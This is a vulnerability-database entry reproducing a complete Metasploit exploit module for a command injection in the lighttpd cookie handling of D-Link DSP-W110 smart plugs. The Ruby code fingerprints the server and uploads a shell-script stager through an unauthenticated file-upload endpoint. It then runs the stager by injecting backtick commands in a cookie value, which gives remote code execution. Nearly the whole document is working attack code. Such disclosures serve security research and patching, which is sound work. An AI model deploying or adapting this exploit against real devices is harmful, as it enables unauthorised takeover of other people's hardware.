D-Link Cookie Command Execution

2015-08-28T00:00:00
ID SSV:89256
Type seebug
Reporter Jeremy_he
Modified 2015-08-28T00:00:00

Description

<p>This module exploits an anonymous remote upload and code execution vulnerability on different D-Link devices. The vulnerability is a command injection in the cookie handling process of the lighttpd web server when handling specially crafted cookie values. This module has been successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.<br></p>

                                        
                                            
                                                ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'D-Link Cookie Command Execution',
      'Description'    =&gt; %q{
        This module exploits an anonymous remote upload and code execution vulnerability on different
        D-Link devices. The vulnerability is a command injection in the cookie handling process of the
        lighttpd web server when handling specially crafted cookie values. This module has been
        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
      },
      'Author'         =&gt;
        [
          'Peter Adkins &lt;peter.adkins[at]kernelpicnic.net&gt;', # vulnerability discovery and initial PoC
          'Michael Messner &lt;devnull[at]s3cur1ty.de&gt;' # Metasploit module
        ],
      'License'        =&gt; MSF_LICENSE,
      'Platform'       =&gt; 'linux',
      'References'     =&gt;
        [
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
        ],
      'DisclosureDate' =&gt; 'Jun 12 2015',
      'Payload'        =&gt;
        {
          'DisableNops' =&gt; true
        },
      'Targets' =&gt;
        [
          [ 'MIPS Little Endian',  # unknown if there are LE devices out there ... but in case we have a target
            {
              'Platform' =&gt; 'linux',
              'Arch'     =&gt; ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',
            {
              'Platform' =&gt; 'linux',
              'Arch'     =&gt; ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'    =&gt; 1
      ))
  end
 
  def check
    begin
      res = send_request_cgi({
        'uri'    =&gt; '/',
        'method' =&gt; 'GET'
      })
 
      if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
 
    Exploit::CheckCode::Unknown
  end
 
  def exploit
    print_status("#{peer} - Trying to access the device ...")
 
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end
 
    print_status("#{peer} - Uploading stager ...")
    @counter = 1
    execute_cmdstager(
      :flavor  =&gt; :echo,
      :linemax =&gt; 95  # limited by our upload, larger payloads crash the web server
    )
 
    print_status("#{peer} - creating payload and executing it ...")
 
    (1 .. @counter).each do |act_file|
      # the http server blocks access to our files ... we copy it to a new one
      # the length of our command is restricted to 19 characters
      cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "chmod +x /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "/tmp/#{act_file+@counter}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file}"
      execute_final_command(cmd)
      cmd = "rm /tmp/#{act_file+@counter}"
      execute_final_command(cmd)
    end
  end
 
  def execute_command(cmd,opts)
    # upload our stager to a shell script
    # upload takes quite long because there is no response from the web server
 
    file_upload = "#!/bin/sh\n"
    file_upload &lt;&lt; cmd &lt;&lt; "\n"
 
    post_data = Rex::MIME::Message.new
    post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
    post_data.bound = "-#{rand_text_alpha(12)}--"
    file = post_data.to_s
 
    @counter = @counter + 1
 
    begin
      send_request_cgi({
        'method'        =&gt; 'POST',
        'uri'           =&gt; "/web_cgi.cgi",
        'vars_get' =&gt; {
          '&request' =&gt;'UploadFile',
          'path' =&gt; '/tmp/'
        },
        'encode_params' =&gt; false,
        'ctype'         =&gt; "multipart/form-data; boundary=#{post_data.bound}",
        'data'          =&gt; file
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
 
  end
 
  def execute_final_command(cmd)
    # very limited space - larger commands crash the webserver
    fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length &gt; 18
    begin
      send_request_cgi({
        'method'        =&gt; 'GET',
        'uri'           =&gt; "/",
        'cookie'        =&gt; "i=`#{cmd}`"
      }, 5)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end